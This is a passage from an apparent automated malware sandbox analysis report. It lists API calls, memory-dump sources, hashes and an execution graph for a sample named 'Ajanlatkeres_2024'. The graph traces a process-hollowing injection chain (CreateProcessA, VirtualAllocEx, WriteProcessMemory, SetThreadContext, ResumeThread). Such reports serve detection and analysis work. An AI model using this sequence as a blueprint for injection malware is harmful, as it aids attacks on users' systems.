                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0136B019,00000800,00000000,00000000), ref: 0136B22A
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1322056392.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_1360000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: ad13cb55a8014e51b5dad24c31f8bfa106e17024ea30141baa01acbfa65bfa16
                                              • Instruction ID: 193e1bc82b92d23102829d25c7a74996117ac0e4b2a33184f5925448ef11d612
                                              • Opcode Fuzzy Hash: ad13cb55a8014e51b5dad24c31f8bfa106e17024ea30141baa01acbfa65bfa16
                                              • Instruction Fuzzy Hash: DC1123B69002488FDB10CFAAD444BDEFBF4EB48710F14842AD959A7300C375A545CFA4
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0729736E
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 65f99c72dd967b76fc047e051916dd41140d33d1cdea4b862f1580080d4e4fe1
                                              • Instruction ID: 52e2dbfb2274f80a6ccfb7d2682ffdafd16f937839b766dc8fea279b2c9c350a
                                              • Opcode Fuzzy Hash: 65f99c72dd967b76fc047e051916dd41140d33d1cdea4b862f1580080d4e4fe1
                                              • Instruction Fuzzy Hash: 821137B19003499FDF10DFAAC844BDEBBF5EF48310F148429E955A7250C7759944CFA4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: b9d2d7b4e8e451c6b966d9587b420f6ac9e98dbd370dac5b8c2bc4453a7ac982
                                              • Instruction ID: 023cfaafd18618da8088f95b965198c537947dcf4e44e8a21a5f6a324358e143
                                              • Opcode Fuzzy Hash: b9d2d7b4e8e451c6b966d9587b420f6ac9e98dbd370dac5b8c2bc4453a7ac982
                                              • Instruction Fuzzy Hash: 1A1155B19003098FDB10DFAAC8447AEFBF4EB88320F248829D459A7240CB75A944CBA4
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0729B695
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 5eb3fc98a885a7102d0204e67200cd3fc3ab4dedd0de02b79e33974a140de5e7
                                              • Instruction ID: 78930a5432c9e5d32603eda60d7da3326a7ef820c48d5fe6c689c6da382720bd
                                              • Opcode Fuzzy Hash: 5eb3fc98a885a7102d0204e67200cd3fc3ab4dedd0de02b79e33974a140de5e7
                                              • Instruction Fuzzy Hash: 791133B5810749DFDB10CF9AD484BEEBBF8FB48310F148429E958A7200C375A944CFA0
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0136AF9E
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1322056392.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_1360000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: e7c2f034b062e8455a92d303d980c2ab73ff652a07ae3ce020e425e23981d96c
                                              • Instruction ID: 14cd6233cdfd496ce684ee675a32647e3d5ea3243fc6f29ff3fde22a4703cd78
                                              • Opcode Fuzzy Hash: e7c2f034b062e8455a92d303d980c2ab73ff652a07ae3ce020e425e23981d96c
                                              • Instruction Fuzzy Hash: 911113B5C00649CFDB10CF9AC844BDEFBF8AB88714F10842AD959B7240C375A549CFA1
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0729B695
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 5066bc73eaef6d1d5a9b19cc98cf4d2698987d626334d49dd4b590c9d5503675
                                              • Instruction ID: 53287893a40ac8c2c011c72b21fbb372bb99c1e57a9235f55510537b42b133de
                                              • Opcode Fuzzy Hash: 5066bc73eaef6d1d5a9b19cc98cf4d2698987d626334d49dd4b590c9d5503675
                                              • Instruction Fuzzy Hash: D711F2B5800749DFDB10CF9AD984BDEFBF8EB48710F148829E559A7200C375A584CFA5
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1320227864.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_109d000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b7ba81581a96aab902e048d69f344da65980fe8091053902958053af90891dd0
                                              • Instruction ID: f211d65f6cd6b61a6a027d43fe54c44f02d3a72377ed0c6a8f67756f416d7028
                                              • Opcode Fuzzy Hash: b7ba81581a96aab902e048d69f344da65980fe8091053902958053af90891dd0
                                              • Instruction Fuzzy Hash: 5B2145B1584200DFDF05DF84D9C0B6ABBA5FB88324F20C1ADE9490F256C736E456DBA2
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1320458542.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_10ad000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c3e7f8276c984790bcc4d8d2ad6fc4070fb7bcdd1f2daf89894e2885987dd51e
                                              • Instruction ID: c7b1b320298a8a3488b071275e7122185803e92f02cd9fedcdde5356a62a5b63
                                              • Opcode Fuzzy Hash: c3e7f8276c984790bcc4d8d2ad6fc4070fb7bcdd1f2daf89894e2885987dd51e
                                              • Instruction Fuzzy Hash: AF212271684300DFDB15DFA4D980F26BBA1EB88354F60C5ADE88A4B652C336D457CB62
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1320458542.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_10ad000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1eb31eeb8ca5a23b2653464c66539e293e55bd3110bc411b8bc133007e954b77
                                              • Instruction ID: 146ff06b12d34650b5bbad3688cad80b52786519e7b8970fe2233660ef88f175
                                              • Opcode Fuzzy Hash: 1eb31eeb8ca5a23b2653464c66539e293e55bd3110bc411b8bc133007e954b77
                                              • Instruction Fuzzy Hash: 9D214671504300EFDB05DFD4D9C0B2ABBA1FB98324F60C5ADE8894B652C336D846CB61
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1320458542.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_10ad000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7821d03bd8eac4d225e46f7fd33acaa882de07be24ee2b900140a1a838be1ac
                                              • Instruction ID: 9994069af45456a1dcce2c91138339dc9e6c33fc2946502016a13c939fca0896
                                              • Opcode Fuzzy Hash: d7821d03bd8eac4d225e46f7fd33acaa882de07be24ee2b900140a1a838be1ac
                                              • Instruction Fuzzy Hash: 9A2183755483809FCB02CF64D994B11BFB1EB46314F28C5DAD8898F6A7C33A9856CB62
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1320227864.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_109d000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                              • Instruction ID: 34aba0da386cddcf3e940e2cbaf18cd0a8f4f6becc3a56e3748156f269d4a53d
                                              • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                              • Instruction Fuzzy Hash: E411CD72444240CFCF02CF44D5C4B56BFA1FB84324F2482A9D8490B657C33AE45ADBA1
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1320458542.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_10ad000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                              • Instruction ID: cddd681f44631093e3feed5d042640deb9cb08ff1ae11851d7faef0c3fbd8557
                                              • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                              • Instruction Fuzzy Hash: 8611BB75504280DFCB42CF94C5C4B15BBA1FB84324F24C6A9D8894BAA6C33AD44ACB61
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7788d9543432fb65275eb67a360352f427e558ef9dac63b8b117e35a2bc25aeb
                                              • Instruction ID: 49258564386a2e4f4e16c1579c1ff603c228d0e023c71387d3e445f90bd3652c
                                              • Opcode Fuzzy Hash: 7788d9543432fb65275eb67a360352f427e558ef9dac63b8b117e35a2bc25aeb
                                              • Instruction Fuzzy Hash: 5BD1BDB17107068FDB29EBB9C4507AEB7FAAF89600F18847DD146DB294CB35E901CB61
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8cc131f1277f519d521d0884e1f5a32b3c5d50eed3e2aa648ffc986504505020
                                              • Instruction ID: b0f3afc0f9c6c4cb99f3b19029e8512a89ba4232b69b03de60e4e2f911175a62
                                              • Opcode Fuzzy Hash: 8cc131f1277f519d521d0884e1f5a32b3c5d50eed3e2aa648ffc986504505020
                                              • Instruction Fuzzy Hash: BCE10CB4E102598FDB14DF99C580AAEFBB2FF89305F24816AD815AB356D7309D42CF60
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f8b0e2113ad955f467b004ece9f3c2ade2c51e9956fc3a61eea891fd7e39dcc1
                                              • Instruction ID: e4ba902e588eeaf03ffdc18aec6d3a81e8d838ec1b59f317ef6df17723dd938a
                                              • Opcode Fuzzy Hash: f8b0e2113ad955f467b004ece9f3c2ade2c51e9956fc3a61eea891fd7e39dcc1
                                              • Instruction Fuzzy Hash: F0E1F6B4E102198FDB14DFA9C580AAEFBF2BF89305F24816AD415AB356D730AD45CF60
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 47a2b4d275d4d07df8c435b6e9d104570d9bf8d02da590cc16aef75fb4055546
                                              • Instruction ID: 93c4b8bf4eca55157bedb1f6b9fd90429f96224d06507559bcebedd38ab1425f
                                              • Opcode Fuzzy Hash: 47a2b4d275d4d07df8c435b6e9d104570d9bf8d02da590cc16aef75fb4055546
                                              • Instruction Fuzzy Hash: 0EE13CB4E102598FDB14DFA9C5809AEFBB2FF89305F24816AD414AB356D7319D42CF60
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 73519f11b921c8ecb3a28b19e5ce7de63451bd27fad071ffbb50a69ad5ef101e
                                              • Instruction ID: 851d12ad8e9208046db40bb8186bf5594b4ca97458fdfb57750070462f48596a
                                              • Opcode Fuzzy Hash: 73519f11b921c8ecb3a28b19e5ce7de63451bd27fad071ffbb50a69ad5ef101e
                                              • Instruction Fuzzy Hash: D8E12AB4E102598FDB14DFA9C590AAEFBB2BF89305F24816AD414AB356D7309D42CF60
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1332296626.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7290000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9687d7dd215c634a17ea14d651d0538f8b356c75734f5d109c0d652a88e3b9a
                                              • Instruction ID: 825b7d173d486c7cf90375015558f51bb3558b678b99e55d9f01ddbce1850fc0
                                              • Opcode Fuzzy Hash: c9687d7dd215c634a17ea14d651d0538f8b356c75734f5d109c0d652a88e3b9a
                                              • Instruction Fuzzy Hash: 22E1EAB4E102198FDB14DFA9C580AAEBBF2FF89305F24816AD415AB356D7319D41CFA0
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1322056392.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_1360000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0940a30f78aecb71d67015333bfdfe6b23b6f685531ddc823159783483fca823
                                              • Instruction ID: 06ec21b62309b848549658322d2e9a046f31dd96770c56864e36a4cfd877d142
                                              • Opcode Fuzzy Hash: 0940a30f78aecb71d67015333bfdfe6b23b6f685531ddc823159783483fca823
                                              • Instruction Fuzzy Hash: EEA1A332E00209CFCF15DFB8D85059EBBBAFF84304B15856AE901AF269DB71E916CB40
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1322056392.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_1360000_Ajanlatkeres_2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d96fabd543c3bd42e9a40920100df662e519cd063f4760b3bf95c8b66bd16be
                                              • Instruction ID: 3e427a7a41f3af846d76dab9dc38b5772384a169c7d9f1c124f65ec423243603
                                              • Opcode Fuzzy Hash: 1d96fabd543c3bd42e9a40920100df662e519cd063f4760b3bf95c8b66bd16be
                                              • Instruction Fuzzy Hash: AEE0C2F16093598FDF12EB72EC92A823B75BB11215F1683C3D000CA14FD63895478FA5

                                              Execution Graph

                                              Execution Coverage:11.1%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:1.7%
                                              Total number of Nodes:298
                                              Total number of Limit Nodes:10
                                              execution_graph 47479 77b7c7b 47480 77b7c8b 47479->47480 47481 77b7aa0 47479->47481 47482 77b7d20 47481->47482 47487 77b89ae 47481->47487 47503 77b8900 47481->47503 47519 77b8940 47481->47519 47534 77b8950 47481->47534 47488 77b893c 47487->47488 47489 77b89b1 47487->47489 47498 77b898e 47488->47498 47549 77b9659 47488->47549 47553 77b8dc5 47488->47553 47557 77b9586 47488->47557 47561 77b8f20 47488->47561 47566 77b96aa 47488->47566 47571 77b93ab 47488->47571 47576 77b8fb0 47488->47576 47581 77b9271 47488->47581 47586 77b8f12 47488->47586 47590 77b92bd 47488->47590 47595 77b8eb9 47488->47595 47601 77b8e99 47488->47601 47489->47482 47498->47482 47504 77b8956 47503->47504 47505 77b890e 47503->47505 47506 77b9659 2 API calls 47504->47506 47507 77b8e99 2 API calls 47504->47507 47508 77b8eb9 2 API calls 47504->47508 47509 77b92bd 2 API calls 47504->47509 47510 77b8f12 2 API calls 47504->47510 47511 77b9271 2 API calls 47504->47511 47512 77b8fb0 2 API calls 47504->47512 47513 77b93ab 2 API calls 47504->47513 47514 77b898e 47504->47514 47515 77b96aa 2 API calls 47504->47515 47516 77b8f20 2 API calls 47504->47516 47517 77b9586 2 API calls 47504->47517 47518 77b8dc5 2 API calls 47504->47518 47505->47482 47506->47514 47507->47514 47508->47514 47509->47514 47510->47514 47511->47514 47512->47514 47513->47514 47514->47482 47515->47514 47516->47514 47517->47514 47518->47514 47520 77b8956 47519->47520 47521 77b9659 2 API calls 47520->47521 47522 77b8e99 2 API calls 47520->47522 47523 77b8eb9 2 API calls 47520->47523 47524 77b92bd 2 API calls 47520->47524 47525 77b8f12 2 API calls 47520->47525 47526 77b9271 2 API calls 47520->47526 47527 77b8fb0 2 API calls 47520->47527 47528 77b93ab 2 API calls 47520->47528 47529 77b898e 47520->47529 47530 77b96aa 2 API calls 47520->47530 47531 77b8f20 2 API calls 47520->47531 47532 77b9586 2 API calls 47520->47532 47533 77b8dc5 2 API calls 47520->47533 47521->47529 47522->47529 47523->47529 47524->47529 47525->47529 47526->47529 47527->47529 47528->47529 47529->47482 47530->47529 47531->47529 47532->47529 47533->47529 47535 77b8956 47534->47535 47536 77b9659 2 API calls 47535->47536 47537 77b8e99 2 API calls 47535->47537 47538 77b8eb9 2 API calls 47535->47538 47539 77b92bd 2 API calls 47535->47539 47540 77b8f12 2 API calls 47535->47540 47541 77b9271 2 API calls 47535->47541 47542 77b8fb0 2 API calls 47535->47542 47543 77b93ab 2 API calls 47535->47543 47544 77b898e 47535->47544 47545 77b96aa 2 API calls 47535->47545 47546 77b8f20 2 API calls 47535->47546 47547 77b9586 2 API calls 47535->47547 47548 77b8dc5 2 API calls 47535->47548 47536->47544 47537->47544 47538->47544 47539->47544 47540->47544 47541->47544 47542->47544 47543->47544 47544->47482 47545->47544 47546->47544 47547->47544 47548->47544 47606 77b6df0 47549->47606 47610 77b6de9 47549->47610 47550 77b9673 47614 77b7648 47553->47614 47618 77b763c 47553->47618 47622 77b72f8 47557->47622 47626 77b7300 47557->47626 47558 77b95a4 47562 77b8ea6 47561->47562 47630 77b73b8 47562->47630 47634 77b73c0 47562->47634 47563 77b9735 47567 77b9658 47566->47567 47569 77b6de9 Wow64SetThreadContext 47567->47569 47570 77b6df0 Wow64SetThreadContext 47567->47570 47568 77b9673 47569->47568 47570->47568 47572 77b9288 47571->47572 47573 77b9220 47571->47573 47638 77b6d38 47572->47638 47642 77b6d40 47572->47642 47573->47498 47577 77b936a 47576->47577 47646 77b74a8 47577->47646 47650 77b74b0 47577->47650 47578 77b9173 47578->47498 47582 77b9277 47581->47582 47584 77b6d38 ResumeThread 47582->47584 47585 77b6d40 ResumeThread 47582->47585 47583 77b9220 47583->47498 47584->47583 47585->47583 47587 77b91b8 47586->47587 47588 77b73b8 WriteProcessMemory 47587->47588 47589 77b73c0 WriteProcessMemory 47587->47589 47588->47587 47589->47587 47593 77b6de9 Wow64SetThreadContext 47590->47593 47594 77b6df0 Wow64SetThreadContext 47590->47594 47591 77b8f4d 47591->47590 47592 77b96f7 47591->47592 47593->47591 47594->47591 47597 77b8ebf 47595->47597 47596 77b8fd5 47596->47498 47597->47596 47599 77b73b8 WriteProcessMemory 47597->47599 47600 77b73c0 WriteProcessMemory 47597->47600 47598 77b90ea 47598->47498 47599->47598 47600->47598 47602 77b8e9f 47601->47602 47604 77b73b8 WriteProcessMemory 47602->47604 47605 77b73c0 WriteProcessMemory 47602->47605 47603 77b9735 47604->47603 47605->47603 47607 77b6e35 Wow64SetThreadContext 47606->47607 47609 77b6e7d 47607->47609 47609->47550 47611 77b6e35 Wow64SetThreadContext 47610->47611 47613 77b6e7d 47611->47613 47613->47550 47615 77b76d1 47614->47615 47615->47615 47616 77b7836 CreateProcessA 47615->47616 47617 77b7893 47616->47617 47619 77b76d1 47618->47619 47619->47619 47620 77b7836 CreateProcessA 47619->47620 47621 77b7893 47620->47621 47623 77b7340 VirtualAllocEx 47622->47623 47625 77b737d 47623->47625 47625->47558 47627 77b7340 VirtualAllocEx 47626->47627 47629 77b737d 47627->47629 47629->47558 47631 77b7408 WriteProcessMemory 47630->47631 47633 77b745f 47631->47633 47633->47563 47635 77b7408 WriteProcessMemory 47634->47635 47637 77b745f 47635->47637 47637->47563 47639 77b6d80 ResumeThread 47638->47639 47641 77b6db1 47639->47641 47641->47573 47643 77b6d80 ResumeThread 47642->47643 47645 77b6db1 47643->47645 47645->47573 47647 77b74fb ReadProcessMemory 47646->47647 47649 77b753f 47647->47649 47649->47578 47651 77b74fb ReadProcessMemory 47650->47651 47653 77b753f 47651->47653 47653->47578 47654 77b7d3c 47655 77b7d10 47654->47655 47657 77b89ae 12 API calls 47655->47657 47658 77b8950 12 API calls 47655->47658 47659 77b8940 12 API calls 47655->47659 47660 77b8900 12 API calls 47655->47660 47656 77b7d20 47657->47656 47658->47656 47659->47656 47660->47656 47764 5576f40 47765 5576f6d 47764->47765 47770 5576a8c 47765->47770 47767 55770e4 47768 5576a8c 2 API calls 47767->47768 47769 5577116 47768->47769 47771 5576a97 47770->47771 47774 1615cec 2 API calls 47771->47774 47775 16182a8 47771->47775 47772 5578c33 47772->47767 47774->47772 47776 16182ab 47775->47776 47778 161856b 47776->47778 47779 161ac18 2 API calls 47776->47779 47777 16185a9 47777->47772 47778->47777 47780 161cd01 2 API calls 47778->47780 47781 161cd10 2 API calls 47778->47781 47779->47778 47780->47777 47781->47777 47782 13bd01c 47783 13bd034 47782->47783 47784 13bd08e 47783->47784 47788 55727b3 47783->47788 47793 5572808 47783->47793 47798 5572818 47783->47798 47789 5572809 47788->47789 47790 5572877 47789->47790 47803 5572da8 47789->47803 47808 5572c43 47789->47808 47794 5572845 47793->47794 47795 5572877 47794->47795 47796 5572c43 2 API calls 47794->47796 47797 5572da8 2 API calls 47794->47797 47796->47795 47797->47795 47799 5572845 47798->47799 47800 5572877 47799->47800 47801 5572c43 2 API calls 47799->47801 47802 5572da8 2 API calls 47799->47802 47801->47800 47802->47800 47805 5572dbc 47803->47805 47804 5572e48 47804->47790 47813 5572e60 47805->47813 47816 5572e4f 47805->47816 47809 5572d88 47808->47809 47811 5572e60 2 API calls 47809->47811 47812 5572e4f 2 API calls 47809->47812 47810 5572e48 47810->47790 47811->47810 47812->47810 47814 5572e71 47813->47814 47820 5574022 47813->47820 47814->47804 47817 5572e60 47816->47817 47818 5572e71 47817->47818 47819 5574022 2 API calls 47817->47819 47818->47804 47819->47818 47824 5574050 47820->47824 47828 5574040 47820->47828 47821 557403a 47821->47814 47825 5574092 47824->47825 47826 5574099 47824->47826 47825->47826 47827 55740ea CallWindowProcW 47825->47827 47826->47821 47827->47826 47829 5574092 47828->47829 47831 5574099 47828->47831 47830 55740ea CallWindowProcW 47829->47830 47829->47831 47830->47831 47831->47821 47661 1614668 47662 161467a 47661->47662 47663 1614686 47662->47663 47667 1614779 47662->47667 47672 1614218 47663->47672 47665 16146a5 47668 161479d 47667->47668 47676 1614878 47668->47676 47680 1614888 47668->47680 47673 1614223 47672->47673 47688 1615c6c 47673->47688 47675 1616ff0 47675->47665 47677 1614888 47676->47677 47679 161498c 47677->47679 47684 16144e0 47677->47684 47682 16148af 47680->47682 47681 161498c 47681->47681 47682->47681 47683 16144e0 CreateActCtxA 47682->47683 47683->47681 47685 1615918 CreateActCtxA 47684->47685 47687 16159db 47685->47687 47689 1615c77 47688->47689 47692 1615c8c 47689->47692 47691 1617095 47691->47675 47693 1615c97 47692->47693 47696 1615cbc 47693->47696 47695 161717a 47695->47691 47697 1615cc7 47696->47697 47700 1615cec 47697->47700 47699 161726d 47699->47695 47701 1615cf7 47700->47701 47703 161856b 47701->47703 47707 161ac18 47701->47707 47702 16185a9 47702->47699 47703->47702 47711 161cd10 47703->47711 47716 161cd01 47703->47716 47721 161ac50 47707->47721 47724 161ac3f 47707->47724 47708 161ac2e 47708->47703 47713 161cd31 47711->47713 47712 161cd55 47712->47702 47713->47712 47748 161cec0 47713->47748 47752 161ceaf 47713->47752 47717 161cd10 47716->47717 47718 161cd55 47717->47718 47719 161cec0 2 API calls 47717->47719 47720 161ceaf 2 API calls 47717->47720 47718->47702 47719->47718 47720->47718 47728 161ad48 47721->47728 47722 161ac5f 47722->47708 47725 161ac50 47724->47725 47727 161ad48 2 API calls 47725->47727 47726 161ac5f 47726->47708 47727->47726 47729 161ad59 47728->47729 47730 161ad7c 47728->47730 47729->47730 47736 161afe0 47729->47736 47740 161afd0 47729->47740 47730->47722 47731 161af80 GetModuleHandleW 47733 161afad 47731->47733 47732 161ad74 47732->47730 47732->47731 47733->47722 47737 161aff4 47736->47737 47738 161b019 47737->47738 47744 161a108 47737->47744 47738->47732 47741 161aff4 47740->47741 47742 161a108 LoadLibraryExW 47741->47742 47743 161b019 47741->47743 47742->47743 47743->47732 47745 161b1c0 LoadLibraryExW 47744->47745 47747 161b239 47745->47747 47747->47738 47749 161cecd 47748->47749 47751 161cf07 47749->47751 47756 161b720 47749->47756 47751->47712 47753 161cecd 47752->47753 47754 161cf07 47753->47754 47755 161b720 2 API calls 47753->47755 47754->47712 47755->47754 47757 161b72b 47756->47757 47759 161dc18 47757->47759 47760 161d024 47757->47760 47759->47759 47761 161d02f 47760->47761 47762 1615cec 2 API calls 47761->47762 47763 161dc87 47762->47763 47763->47759 47837 161d3d8 47838 161d41e 47837->47838 47842 161d5a7 47838->47842 47846 161d5b8 47838->47846 47839 161d50b 47843 161d5b8 47842->47843 47849 161b730 47843->47849 47847 161b730 DuplicateHandle 47846->47847 47848 161d5e6 47847->47848 47848->47839 47850 161d620 DuplicateHandle 47849->47850 47851 161d5e6 47850->47851 47851->47839 47832 77baf90 47833 77baf9e 47832->47833 47836 77ba878 PostMessageW 47833->47836 47835 77bafb7 47836->47835 47852 77ba080 47853 77ba20b 47852->47853 47855 77ba0a6 47852->47855 47855->47853 47856 77b9c70 47855->47856 47857 77ba300 PostMessageW 47856->47857 47858 77ba36c 47857->47858 47858->47855
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1341162971.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_55a0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b039512a89660c0f089a4b1a61ec335735bca0c21491a505b5022e8bfee3609d
                                              • Instruction ID: 09161fef089217cfa7b62bf2ee93eefc2646f90688e78e7cd0d6c769b9e6ab07
                                              • Opcode Fuzzy Hash: b039512a89660c0f089a4b1a61ec335735bca0c21491a505b5022e8bfee3609d
                                              • Instruction Fuzzy Hash: 1FB1C1B1D04229CFDB14DFA9C8447EEFBB2BB49304F50945AD419A7640EB741A4ACF50
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.1341162971.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_55a0000_YLc7afPlL4RjCeK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 44f917e7511734ceb574a9ce9a5f3d393e9d8ee5b3f5380b26a3c64f704587dd
                                              • Instruction ID: 82b1b7aa7a193cd4fd6e9a00fc2c2eab7235bf88a434653b05e4d1009133d03b
